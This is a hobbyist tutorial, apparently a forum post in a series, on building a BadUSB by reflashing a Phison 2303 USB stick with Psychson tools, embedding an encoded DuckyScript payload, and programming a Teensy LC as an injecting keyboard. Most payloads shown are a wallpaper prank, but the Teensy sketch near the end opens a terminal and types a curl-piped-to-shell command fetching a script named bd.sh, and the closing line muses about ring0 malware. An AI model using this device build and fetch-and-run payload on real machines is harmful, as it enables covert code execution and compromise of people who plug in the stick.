Hey Mates!
This time I’ll show you how to build your own Bad USB for about $10. It’s pretty easy, but it requires a compatible USB stick.
Requirements
You’ll need a USB stick with the Phison 2303 (2251-03) microcontroller. Sadly you can’t just ask your favourite hardware shop which controller is installed, so it’s a matter of luck. I was lucky enough to already have a compatible one at home. You can find a list of known compatible devices here.
How To Test The Microcontroller
Just download the tool from this Russian site. It’s the first blue link.
You should get output like the screenshot below. Look at the second entry, Controller: if it reads Phison 2303 (2251-03), you have won. The stick shown here is sadly incompatible.
The Build-Environment
Now you’ll have to download Microsoft Visual Studio (2012 or higher) and SDCC. Visual Studio builds the two host-side tools (DriveCom and EmbedPayload), and SDCC compiles the 8051 firmware that runs on the controller itself; both are required for the next steps.
Building The Source
Once Visual Studio is installed, get the source from GitHub. Extract it and open DriveCom and EmbedPayload in Visual Studio, then build them (Build -> Build Solution).
Download A Burner Image
The Burner Image is required for flashing the firmware later on: it is the small helper image that DriveCom loads onto the controller in boot mode so that the firmware flash can be read and written. Again we only have a Russian site, but that is no problem. Just search the site for “BN03” (CTRL+F) and download the .rar package.
Download The DuckEncoder
If you’ve followed my first part, you’ll already have one installed. If not, just get it here.
How To Flash
Now that we’re done preparing our environment, we can start using the tools.
Warning
I cannot guarantee that everything will run fine. I’ve never encountered any problems, but I can’t promise it. Everything beyond this point is up to you!
Custom Firmware
Go to \Psychson\firmware and run build.bat. If everything went right, you should see a new folder called bin with several files in it. We’ll need the fw.bin file.
Creating Your DuckyScript
We discussed that in the earlier parts. I recommend using something simple, like a wallpaper prank:
REM Wallpaper prank: screenshot the desktop, hide the icons, set the shot as wallpaper
GUI d
DELAY 500
PRINTSCREEN
DELAY 100
REM Desktop context menu -> View -> Show desktop icons (toggles the icons off)
MENU
DELAY 300
STRING V
DELAY 40
STRING D
DELAY 300
REM Open Paint and paste the screenshot
GUI r
DELAY 700
STRING mspaint
ENTER
DELAY 1200
CTRL v
DELAY 500
REM Save it as a.bmp in the user profile
CTRL s
DELAY 1000
STRING %userprofile%\a.bmp
ENTER
DELAY 500
REM File -> Set as desktop background -> Fill, then close Paint
ALT f
DELAY 400
STRING K
DELAY 100
STRING F
DELAY 1000
ALT F4
DELAY 300
GUI d
Now you have to encode it with the DuckEncoder, as I explained in part 1. A quick reminder:
java -jar duckencoder.jar -i <input file> -o <output file> -l <language>
The -l option selects the keyboard layout of the target machine; a payload encoded for the wrong layout will type the wrong characters.
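To see what the encoder actually writes into inject.bin (which is what EmbedPayload later stuffs into fw.bin), here is a small encoder and disassembler as an added example. It is not part of the original post and is neither DuckEncoder nor Psychson code. It assumes the Rubber Ducky inject.bin layout as I know it (two bytes per keystroke, the HID keycode followed by the modifier byte, and a 0x00 byte plus a millisecond count for every DELAY slice of at most 255 ms), a US keyboard layout, and only the commands used in the prank above. SAMPLE_SCRIPT is a constructed excerpt of the prank.

```python
"""Minimal DuckyScript -> inject.bin encoder and disassembler (added example,
not the DuckEncoder and not Psychson code). Assumed layout, the Rubber Ducky
inject.bin format as I know it: each keystroke is a [HID keycode, modifier]
byte pair; DELAY n becomes [0x00, slice] pairs with slice <= 255 ms.
US layout only, and only the commands this post uses."""
from __future__ import annotations

# Modifier bits of the USB HID keyboard report (left-hand modifiers only).
MOD_CTRL, MOD_SHIFT, MOD_ALT, MOD_GUI = 0x01, 0x02, 0x04, 0x08
MODIFIERS = {"CTRL": MOD_CTRL, "CONTROL": MOD_CTRL, "SHIFT": MOD_SHIFT,
             "ALT": MOD_ALT, "GUI": MOD_GUI, "WINDOWS": MOD_GUI}
# HID usage IDs (usage page 0x07) for the named keys this post needs.
KEYCODES = {"ENTER": 0x28, "ESCAPE": 0x29, "BACKSPACE": 0x2A, "TAB": 0x2B,
            "SPACE": 0x2C, "PRINTSCREEN": 0x46, "MENU": 0x65, "APP": 0x65}
KEYCODES.update({f"F{n}": 0x39 + n for n in range(1, 13)})  # F1=0x3A .. F12=0x45
# US layout: characters sharing one keycode, unshifted and shifted form.
_UNSHIFTED = "1234567890-=[]\\;'`,./"
_SHIFTED = "!@#$%^&*()_+{}|:\"~<>?"
_PUNCT_CODES = list(range(0x1E, 0x28)) + [0x2D, 0x2E, 0x2F, 0x30, 0x31,
                                          0x33, 0x34, 0x35, 0x36, 0x37, 0x38]
_CODE_NAMES = {v: k for k, v in reversed(list(KEYCODES.items()))}  # MENU beats APP
_CHARS = {_PUNCT_CODES[i]: c for i, c in enumerate(_UNSHIFTED)}
_CHARS.update({0x04 + i: chr(ord("a") + i) for i in range(26)})


def char_to_pair(c: str) -> bytes:
    """Map one printable US-layout character to its [keycode, modifier] pair."""
    if c.isascii() and c.isalpha():
        return bytes([0x04 + ord(c.lower()) - ord("a"), MOD_SHIFT if c.isupper() else 0])
    if c == " ":
        return bytes([KEYCODES["SPACE"], 0])
    if c in _UNSHIFTED:
        return bytes([_PUNCT_CODES[_UNSHIFTED.index(c)], 0])
    if c in _SHIFTED:
        return bytes([_PUNCT_CODES[_SHIFTED.index(c)], MOD_SHIFT])
    raise ValueError(f"no US-layout keycode for {c!r}")


def encode_line(line: str) -> bytes:
    """Encode one DuckyScript line; blank lines and REM produce no bytes."""
    line = line.strip()
    if not line or line.upper().startswith("REM"):
        return b""
    cmd, _, arg = line.partition(" ")
    if cmd.upper() == "DELAY":
        out, remaining = bytearray(), int(arg)
        while remaining > 0:                 # one 0x00 pair per <=255 ms slice
            out += bytes([0x00, min(remaining, 255)])
            remaining -= 255
        return bytes(out)
    if cmd.upper() == "STRING":
        return b"".join(char_to_pair(c) for c in arg)
    code, mods = 0, 0                        # chord: modifiers plus exactly one key
    for tok in line.split():
        if tok.upper() in MODIFIERS:
            mods |= MODIFIERS[tok.upper()]
        elif tok.upper() in KEYCODES:
            code = KEYCODES[tok.upper()]
        elif len(tok) == 1:                  # "GUI d", "CTRL v": plain key, no SHIFT
            code = char_to_pair(tok.lower())[0]
        else:
            raise ValueError(f"unknown token {tok!r} in {line!r}")
    if code == 0:                            # a 0x00 keycode would replay as DELAY
        raise ValueError(f"{line!r}: chord needs a key")
    return bytes([code, mods])


def encode_script(script: str) -> bytes:
    """Encode a whole DuckyScript into the inject.bin byte stream."""
    return b"".join(encode_line(line) for line in script.splitlines())


def disassemble(blob: bytes) -> list[str]:
    """Turn an inject.bin back into readable lines, merging adjacent DELAY slices."""
    if len(blob) % 2:
        raise ValueError("inject.bin must be an even number of bytes")
    lines: list[str] = []
    for code, mods in zip(blob[0::2], blob[1::2]):
        if code == 0:                        # delay slice
            if lines and lines[-1].startswith("DELAY "):
                lines[-1] = f"DELAY {int(lines[-1][6:]) + mods}"
            else:
                lines.append(f"DELAY {mods}")
            continue
        names = [n for n, bit in MODIFIERS.items()
                 if mods & bit and n in ("CTRL", "SHIFT", "ALT", "GUI")]
        names.append(_CODE_NAMES.get(code) or _CHARS.get(code) or f"0x{code:02X}")
        lines.append(" ".join(names))
    return lines


# Constructed sample: the opening of the wallpaper prank from this post.
SAMPLE_SCRIPT = "GUI r\nDELAY 700\nSTRING mspaint\nENTER\nREM rest of the prank\n"

if __name__ == "__main__":
    blob = encode_script(SAMPLE_SCRIPT)
    with open("inject.bin", "wb") as f:      # this is the file EmbedPayload.exe takes
        f.write(blob)
    print(f"wrote {len(blob)} bytes ({len(blob) // 2} pairs); decoded back as:")
    print("\n".join(disassemble(blob)))
```

Running it writes inject.bin for the sample and prints the decoded stream. The disassemble() half is the useful part in practice: point it at an inject.bin produced by the real DuckEncoder before you embed it, and you can spot a lost DELAY or a character that came out with the wrong modifier (the classic Y/Z swap of a wrong -l layout) without plugging anything in.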
Embedding The Payload
Just run the EmbedPayload we built earlier like this:
EmbedPayload.exe <Path to Payload> <Path to fw.bin>
Now fw.bin contains our payload. If you want to start over with a fresh, payload-free fw.bin, simply run build.bat again.
Dumping The Existing Firmware
I recommend dumping your existing firmware first; otherwise you cannot restore it once you’ve had your fun with Bad USB. Just use DriveCom like this:
DriveCom.exe /drive=<letter of your USB drive> /action=DumpFirmware /burner=<Path to our Burner Image> /firmware=<Path where the original firmware should be saved>
Give the dump its own file name (for example orig-fw.bin) and keep it somewhere safe. Do not point it at the modified fw.bin you just built, or the dump will overwrite your payload, and double-check that the drive letter really is the Phison stick and not another drive.
Flashing Our Firmware
Now we can flash our stick with the modified firmware. Bear in mind that afterwards it takes some effort to get the stick back into boot mode! See the following section for more information.
Again we’ll use DriveCom:
DriveCom.exe /drive=<USB drive letter> /action=SendFirmware /burner=<Path to our Burner Image> /firmware=<Path to the modified fw.bin>
If some errors appear, try using an older version of the Burner Image. In my case it fixed the issue.
Reflashing The Bad USB
If you want to reinstall your original firmware or load a new DuckyScript, you’ll have to put the stick back into boot mode. This is not as complicated as it might look. Because the Bad USB now enumerates as a fully functional keyboard rather than a storage device, DriveCom can no longer talk to it from your computer. To get around this, you have to short the two pins at the bottom left:
Once the stick comes up in boot mode, DriveCom’s GetInfo action (/action=GetInfo) should report the controller again, and DumpFirmware or SendFirmware work as before.
At this point props to @anon79434934 for helping me out with the hardware part.
Teensy LC
After my first part, I’ve been in touch with @0x00pf, who already got a Bad USB working by programming a Teensy LC. He did some great work! The following is an equivalent program, like the one I discussed in my first part, written for the Teensy by @0x00pf:
// Teensy LC Bad USB sketch. In the Arduino IDE select Tools -> USB Type -> Keyboard
// (or "Keyboard + Mouse + Joystick"), otherwise the Keyboard object is not available.
void release_keys (void)
{
  // Release all keys and modifiers
  Keyboard.set_modifier (0);
  Keyboard.send_now();
  delay (100);
}

void setup() {
  // Runs once, right after the Teensy is plugged in
  delay (1000);                 // give the host time to enumerate the keyboard
  // Launch terminal (GNOME CTRL+ALT+t)
  Keyboard.set_modifier (MODIFIERKEY_CTRL | MODIFIERKEY_ALT);
  Keyboard.send_now();
  delay (100);
  Keyboard.press(KEY_T);        // sent together with the modifiers set above
  Keyboard.release(KEY_T);
  delay (500); // Wait for the terminal to come up
  release_keys ();
  // Send Command
  Keyboard.println("curl -s http://127.0.0.1:8000/bd.sh | /bin/sh");
  // Close terminal (CTRL+D)
  Keyboard.set_modifier (MODIFIERKEY_CTRL);
  Keyboard.send_now();
  delay (100);
  Keyboard.press(KEY_D);
  Keyboard.release(KEY_D);
  delay (100);
  release_keys ();
}

void loop() {
  // Nothing to do: the payload runs once from setup().
  // An Arduino sketch still needs loop() or it will not compile.
}
Maybe he’s already working on a part about using a Teensy for installing ring0 malware? We’ll see…
Conclusion
This DIY Bad USB is more of a PoC, because you always have to short the two pins to flash the firmware, which can be annoying. Anyway, I hope you enjoyed this short series and are as excited for @0x00pf’s part as I am.
|-TheDoctor-|